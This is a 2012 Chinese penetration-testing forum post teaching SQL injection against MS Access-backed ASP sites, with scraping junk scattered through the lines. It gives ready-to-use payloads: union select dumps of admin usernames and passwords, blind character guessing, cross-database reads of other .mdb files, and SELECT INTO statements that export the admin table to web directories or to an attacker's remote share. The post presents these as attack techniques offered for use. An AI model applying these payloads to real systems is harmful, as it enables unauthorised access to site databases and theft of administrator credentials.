中国网络渗透测试联盟

标题: Access高级注入语句 [打印本页]

作者: admin    时间: 2012-9-15 14:20
标题: Access高级注入语句
--------------------------------------------------------------* U1 h, v# W* p
union查询法6 {0 c4 {  s- c0 J) O, r5 {- V3 M
首先要说的就是查询办法,一般的查询办法就是2 [( A/ s6 r' }- M* j

4 F) G1 v/ l: |9 n! s. z' D程序代码
1 q0 `% I3 W/ j4 W) @6 Nand 1=(select count(*) from admin where left(id,1)='1')
$ ~1 b$ N+ \% [+ d8 D" ], N2 M2 c% Z- z: V  N, S
这样开始判断了...就算你使用各种各样的工具,也是一个个字的去猜去判断对不对,不对再换一个.这样的坏处显而易见,慢. 特别是在猜测经过32位MD5加密过的段的时候...基本上你可以去泡壶茶再喝一杯.$ \& p) t# P6 N5 D  h) t+ M4 ^
所以这个时候,union select横空出现.别以为只能在PHP里用哦...
4 T8 w% t7 [$ e3 j/ Q譬如你有一个ACCESS点:
/ x- ?2 l1 w, |) r4 _程序代码
1 m- z/ H9 K9 G0 Y+ h7 W9 M* Thttp://bbs.tian6.com/xiaoyang.asp?coder=1* ]$ w& z1 p" m# d
5 x! T1 {# l) \1 ?, V
知道存在admin表(你当然可以拿个工具先快速猜出表和字段来),6 Q8 G6 E9 o3 t0 E/ l0 I
然后我们直接来:
6 U% t% b' a. y4 O. m7 X程序代码; y- l8 d% @& n' J- c
http://bbs.tian6.com/xiaoyang.asp?coder=1 union select 1,2,3,4,5,6..... from admin [where coderx=1(如果有限制查询条件)]
. p! J7 t$ |1 d
5 b8 E' ~# Y6 t( a7 {- F这里从1开始加到回显正常为止.然后替换URL里相应在页面出现的1~X为password,username之类的东西,就可以直接暴内容了.多方便,多快捷.茶可以先放放,凉一些再来喝了.
# q, G* x' c' X
/ Y$ b6 f2 n4 R. l: ^' o. p: t( L! A% Z/ d( l

: x5 X: @' B5 H! t  b---------------------------------------------------------------
1 V* v5 x1 d. R* G4 c5 sAccess跨库查询8 W! x: F7 ~+ ]
有时候某个网站服务器上有两个以上系统,你发现其中一个有ACCESS注入点,但是后台没法提权,另外一个系统没有注入点,但是后台却有你需要的功能.那么这个时候,跨库来了.当然,你还可以用来MDB溢出,渗透的过程等等.他的作用往往是意想不到的.5 t0 i; w1 u$ w
跨库的查询语句:
# z; I6 f# ^5 _2 B5 _. X: d$ ?! m子查询:
4 W/ g0 M8 C4 p8 A1 |. e6 z. A9 w4 B4 w程序代码9 [# ^/ Q, m) i0 V, k
and (Select Count(*) from [D:\tianyang\backdoor\xiaoyang.mdb].test)>0
* b% F' p  v& v4 E) g$ L3 K, X( p$ _/ I1 @8 q
union查询:
$ Z0 g' {! Q, \程序代码
1 @) @. P: H8 L" r2 N8 funion select 1,2,3,4.... from admin in "D:\xioatianyang\okok.asa" where id=1: T$ v  M. W: B+ v

) S2 k1 b2 A& B( }6 E跨库的作用当然不只这些了,大伙继续发挥吧..这里提供两篇参考过的文章连接:  h  K6 ?: E7 v/ ^
程序代码4 h, c( x, Q- N9 p9 v, s
http://www.4ngel.net/article/46.htm
+ e5 r7 i: a8 y# H4 B1 r! c2 y) thttp://hf110.com/Article/hack/rqsl/200502/66.html0 `6 B3 H$ l& `& F+ s+ e
2 f# s: w+ P2 B# l$ @
---------------------------------------------------------------
+ ?2 i, Y3 U( x0 T; p4 \: bAccess注入,导出txt,htm,html: t' x5 F/ F1 T! T7 |5 N+ T" a' b
子查询语句:
# P" d$ w6 U5 ^2 H$ @5 G程序代码
7 I+ G& c, p( {2 PSelect * into [test.txt] in 'd:\web\' 'text;' from admin! [* H: ]# S* H- x7 N  s8 B

# @& A- g. w& w) p这样就把admin表的内容以test类型存进了d:\web里面.
9 k& b7 N7 Q6 z) C* K$ ~0 I. O: @: YUNION查询:
8 t1 e! C6 ?# e4 m程序代码$ ?  r4 y7 ?& N- d+ ?
union select * into [admin.txt] in 'c:\' 'test;' from admin& n+ H, c* F4 f0 z

) ]: Q% {" H) j0 P& ~$ x而且这里也可以保存到本地来:
4 Y2 V  _, D8 a1 }* B程序代码( I! e5 z; }$ ], O
Select * into [test.txt] in '\\yourip\share' 'text;' from admin
3 g6 G6 M* A1 \+ x$ P& T+ D. U$ h! K
不过,很多人包括我自己测试,本机数据库来操作是没问题的,但是一旦在注入点上,子查询会回显没有权限,union会回显动作查询不能作为行的来源.可以说还是个难题...原因大概是UNION只适用查询结合,UNION后面不能跟动作.和这个内容相关的,本论坛已有一帖:
, t" s4 G  |' B# m2 k* P
8 Q" }, V! A+ \2 z- g程序代码
6 M3 {% G% M/ Y$ C8 nhttp://bbs.tian6.com/viewthread.php?tid=3016&extra=page%3D7
, O4 V! Q/ q2 d9 k) S7 @, y  \) ?5 w) b2 K1 g& S" P
因为网上有许多和这相关的资料,所以我还是把他引进来了.如果一旦这方法运用成功的话,理论上我们只要知道表名,不需要知道段名,就可以看到该表所有内容了.或者我们可以建.php.tianyang  asp.asp之类的文件或者目录来导进文件~还是会很强大的.# }' O0 i2 Z) L  \4 M3 C





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2